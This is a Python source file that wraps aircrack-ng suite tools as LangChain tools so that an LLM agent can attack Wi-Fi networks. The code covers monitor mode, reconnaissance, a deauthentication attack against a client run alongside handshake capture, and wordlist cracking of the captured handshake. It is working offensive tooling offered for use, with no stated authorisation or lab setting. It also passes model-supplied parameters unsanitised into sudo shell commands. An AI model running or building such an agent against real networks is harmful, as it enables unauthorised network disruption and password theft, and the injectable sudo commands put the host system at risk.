import json import threading import random from langchain_core.pydantic_v1 import BaseModel, Field from langchain.tools import tool from langchain_community.tools import ShellTool """ All of my tools are built to run pre-defined shell tools in particular ways and generally just take CLI parameters as input. I could have gave my agent 1 simple terminal tool, and a strong prompt mentioning the various kali applications used here and let it figure out the details. That might have worked with a lot less code, but when done like this, we lessen the chance that a 'sudo' command goes rogue, and we also handle the needed multithreading case in python """ shell_tool = ShellTool() """ Crack password is a wrapper to run aircrack-ng and expects the LLM to provide the BSSID and packet capture file containing the handshake. Some extra work could be done here to improve robustness including 1) Handle gracefully if the .cap does not actually contain a handshake 2) Take in a custom wordlist provided by the LLM OR 3) Dynamically load one or more word list on the fly from the wordlist directory 4) Show some user feedback while cracking - this can take a while =/ """ class CrackPassword(BaseModel): json_params: str = Field( description="""Should be a string of a json object containing 'bssid': the bssid of the network to crack. 'capfile': the path to the capture file containing the handshake. """ ) @tool( "Perform wifi encryption cracking with aircrack-ng", args_schema=CrackPassword, return_direct=True, ) def wifi_encryption_cracking(json_params: str) -> str: """Must pass bssid and capfile parameters (as a string containing a json object) to aircrack-ng to perform wifi encryption cracking""" json_params = json_params.replace("\\", "") json_obj = json.loads(json_params) bssid = json_obj["bssid"] cap = json_obj["capfile"] res = shell_tool.run( { "commands": [f"aircrack-ng --bssid {bssid} -w wordlist/rockyou.txt {cap}"] } # TODO: Abstrace out wordlist - allow custom/multiple wordlist files as long as they sit in the directory ) return res """ This tool helps us run a combination of airodump-ng and aireplay-ng simultanously to de-auth and capture the handshake. Because we must run these at the same time, we cannot just re-use the reconnaissance tool; instead we need this tool which runs each process in a seprate thread. Overall this works ok assuming the client device choosing to re-connect after a de-auth, which you cannot always control. """ class DeauthAndCapture(BaseModel): json_params: str = Field( description="Should be a string of a json object containing 'bssid', 'channel', client' and 'interface' for the network BSSID, wif channel, de-auth client target id, and the wireless interface respectively" ) @tool( "Perform a de-auth and capture for a given wifi BSSID, channel, and client on the given wireless. All parameters must be identified first. Return the path to the handshake capture pcap file", args_schema=DeauthAndCapture, return_direct=False, ) def deauth_and_capture(json_params: str) -> str: """Can pass bssid, client, channel, and interface parameters to aireplay-ng to perform and capture a de-auth. All parameters must be identified first""" json_obj = json.loads(json_params) bssid = json_obj["bssid"] client = json_obj["client"] interface = json_obj["interface"] channel = json_obj["channel"] hash = random.getrandbits(16) out = f"dumps/deauth-capture-{hash}" def run_airdump(channel, bssid, out, interface): shell_tool.run( { "commands": [ f"sudo timeout -s SIGKILL 15 airodump-ng --band a --channel {channel} --bssid {bssid} --write {out} {interface}" ] } ) def run_aireplay(bssid, client, interface): shell_tool.run( { "commands": [ f"sudo aireplay-ng --deauth 10 -a {bssid} -c {client} {interface}" ] } ) dumpthread = threading.Thread( target=run_airdump, args=(channel, bssid, out, interface) ) playthread = threading.Thread(target=run_aireplay, args=(bssid, client, interface)) dumpthread.start() playthread.start() dumpthread.join() playthread.join() return f"dumps/deauth-capture-{hash}-01.cap" # return path to the handshake capture fil;e """ This tools wraps airodump-ng. airodump is tricky to work with - it does not have any parameter to stop on its own so it needs a timing control, and the SIGKILL is unfortunetly what it takes. It also does not do well with printing to stdout in this enviornment, so we must print to a dump file, and read the contents of the dump file to get this tool to return what we are interested in. I looked into other approaches like 'iw scan', they had their own problems so we just stick with the aircrack suite """ class PacketCapture(BaseModel): params: str = Field( description="Should be the interface name on which to perform reconnaissance, followed by any optional command line flag parameters" ) @tool( "Perform wifi reconnaissance with airodump-ng. Interface must be in monitor mode before starting", args_schema=PacketCapture, return_direct=False, ) def reconnaissance(params: str) -> str: """Use airodump-ng to gather wireless network information. Must take the interface as a parameter and may optionally be followed by command like flag parameters""" hash = random.getrandbits(16) res = shell_tool.run( { "commands": [ f"sudo timeout -s SIGKILL 30 airodump-ng --band a --output-format csv --write dumps/dump-{hash} {params} " # band a for 5Ghz - TODO: make it smart enough to figure out the band you want, or perhaps to ask ] } ) try: with open(f"dumps/dump-{hash}-01.csv", "r") as file: content = file.read() file.close() return content except FileNotFoundError | Exception: return "The file does not exist. Ensure interface is in monitor mode before using this tool" """ Straightfowrad tool wrapping airmon-ng """ class ChangeMonitorMode(BaseModel): params: str = Field( description="Should be command line parameters to 'airmon-ng' to change the state of a given wireless iterface mode." ) @tool( "Change the state of the wireless adapter mode with airmon-ng", args_schema=ChangeMonitorMode, return_direct=False, ) def change_adapter_mode(params: str) -> str: """Can pass parameters to airmon-ng to change the mode of the wireless adapter""" params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM res = shell_tool.run({"commands": [f"sudo airmon-ng {params}", "sleep 5s"]}) # takes time, good idea to sleep return res """ Straightfowrad tool wrapping iwconfig """ class Iwconfig(BaseModel): params: str = Field( description="should be command line parameters to 'iwconfig'. If none are needed, this should be left as an empty string" ) @tool("Get interface information", args_schema=Iwconfig, return_direct=False) def get_wireless_interface(params: str) -> str: """Return wireless interface information via iwconfig""" params = params.replace("`", "").replace("\n", "") # fix buggy input from LLM print("params ", params) res = shell_tool.run({"commands": [f"iwconfig {params}"]}) return res